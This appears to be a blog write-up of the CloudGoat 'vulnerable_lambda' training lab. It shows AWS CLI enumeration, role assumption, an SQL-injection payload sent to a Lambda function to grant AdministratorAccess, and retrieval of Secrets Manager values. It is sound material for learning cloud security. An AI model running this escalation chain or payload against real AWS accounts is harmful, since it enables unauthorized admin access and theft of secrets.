CloudGoat: vulnerable_lambda

0xLeeBai

·

Follow

4 min read

·

May 7, 2024

--

Listen

Share

Note:

• We will be performing our attack via Kali Linux
• Ensure you have done the pre-requisites before you start the lab

1. Preparation

1.1 Launch the scenario:

┌──(root㉿kali)-[~]
└─# cd /opt/cloudgoat

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py create vulnerable_lambda

1.2 Read the start.txt file

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cd vulnerable_lambda*

┌──(root㉿kali)-[/opt/cloudgoat/vul...]
└─# cat start.txt

Access Key ID = AAAABBBBCCCCDDDD
Access Secret Key = 111122223333

1.3 Create profile for bilbo user

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile bilbo

AWS Access Key ID: AAAABBBBCCCCDDDD
AWS Secret Access Key: 111122223333
Default region name:
Default output format:

2. Enumeration

2.1 whoami

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws sts get-caller-identity --profile bilbo --region us-east-1

{
  "UserId": "...",
  "Account": "...",
  "Arn": arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6
}

• arn = arn:aws:iam:1234:user/cg-bilbo-vulnerable-lambda-cgidxqb9uign6
• username = cg-bilbo-vulnerable-lambda-cgidxqb9uign6

2.2: list the policies

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws list-user-policies --user-name cg-bilbo-vulnerable-lambda-cgidxqb9uign6 --profile bilbo --region us-east-1


{
  "PolicyNames": [cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer]
}

2.3: show the details of the policy

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws iam get-user-policy --user-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6 --policy-name cg-bilbo-vulnerable_lambda_cgidxqb9uign6-standard-user-assumer --profile bilbo --region us-east-1

{
  ...  ...  ...
  {
    "Action": "sts:AssumeRole",
    "Effect": "Allow",
    "Resource": "arn:aws:iam:yyy:role/cg-lambda-invoker*"
    "Sid": ""
  }
  ...  ...  ...
}

2.4: list the roles in your account, filter by CloudGoat (ie, start with “cg-”)

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-roles | grep cg-

...  ...  ...
"RoleName": "cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
"Arn": "arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6",
...  ...  ...

2.5: list the policies for that role

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 iam list-role-policies --role-name cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6

{
  "PolicyNames": ["lambda-invoker"]
}

3. Exploitation

3.1: assume the role

• FYI, when we assume a role, it will return us a set of temporary security credentials that we can use to access AWS resources that you might not have access to otherwise. These temporary credentials consist of an access key ID, a secret access key, and a security token.

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 sts assume-role --role-arn arn:aws:iam:yyy:role/cg-lambda-invoker-vulnerable_lambda_cgidxqb9quign6 --role-session-name cloudgoat-session1

{
  "Credentials": {
    "AccessKeyId": "AAA123123",
    "SecretAccessKey": "BBB123123",
    "SessionToken": "CCC123123",
    ...  ...  ...
  }
}

• we got the credentials for the CloudGoat role that can invoke the lambda
• let’s create a new profile based on these credentials

3.2: create new profile for the temporary credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws configure --profile vulnlambda

AWS Access Key ID: AAA123123
AWS Secret Access Key: BBB123123
Default region name:
Default output format:

• we only update the Access Key ID and Secret Access key, what about the session token?
• we have to manually add it into the credentials file

┌──(root㉿kali)-[/opt/cloudgoat]
└─# mousepad /root/.aws/credentials

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat /root/.aws/credentials

[...]
...  ...  ...
[bilbo]
aws_access_key_id = AAAABBBBCCCCDDDD
aws_secret_access_key = 111122223333
[vulnlambda]
aws_access_key_id = AAA123123
aws_secret_access_key = BBB123123
aws_session_token = CCC123123

3.3: list the lambda functions

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda list-functions

{
  "Functions": [
    "FunctionName": "vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1",
    ...  ...  ...
  ]
}

3.4: Return details of that function

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda get-function --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1

{
  "Configuration": {
    ...
    ...
    "code": "https://xxxyyyzzz",
    ...
    ...
   }
}

• we found a URL
• upon open that URL, we downloaded a zip file
• we unzip that zip file, and found many source code inside, one of them is the main.py

• note at line 15, AdministratorAccess = false

3.5: send SQLi payload to the lambda function

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile vulnlambda --region us-east-1 lambda invoke --function-name vulnerable_lambda_cgidxqb9quign6-policy_applier_lambda1 --cli-binary-format raw-in-base64-out --payload '{"policy_names": ["AdministratorAccess'"'"' --"], "user_name": "cg-bilbo-vulnerable-lambda-cgidxqb9uign6"}' out.txt

{
  "StatusCode": 200
  ...  ...  ...
}

┌──(root㉿kali)-[/opt/cloudgoat]
└─# cat out.txt

"All managed policies were applied as expected".

• we have granted “AdministratorAccess” permission to bilbo user
• bilbo is now an admin

3.6: list the secrets in secretsmanager

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager list-secrets

{
  "SecretLists": [
    {
      "Arn": "arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz",
      ...  ...  ...
      ...  ...  ...
    }
  ]
}

┌──(root㉿kali)-[/opt/cloudgoat]
└─# aws --profile bilbo --region us-east-1 secretsmanager get-secret-value --secret-id arn:aws:secretsmanager:us-east-1:xxx:secret:yyyzzz

{
  ...  ...  ...
  ...  ...  ...
}

4. Clean up

┌──(root㉿kali)-[/opt/cloudgoat]
└─# ./cloudgoat.py destroy vulnerable_lambda --help

Destroy "xxx" ? [y/n]: y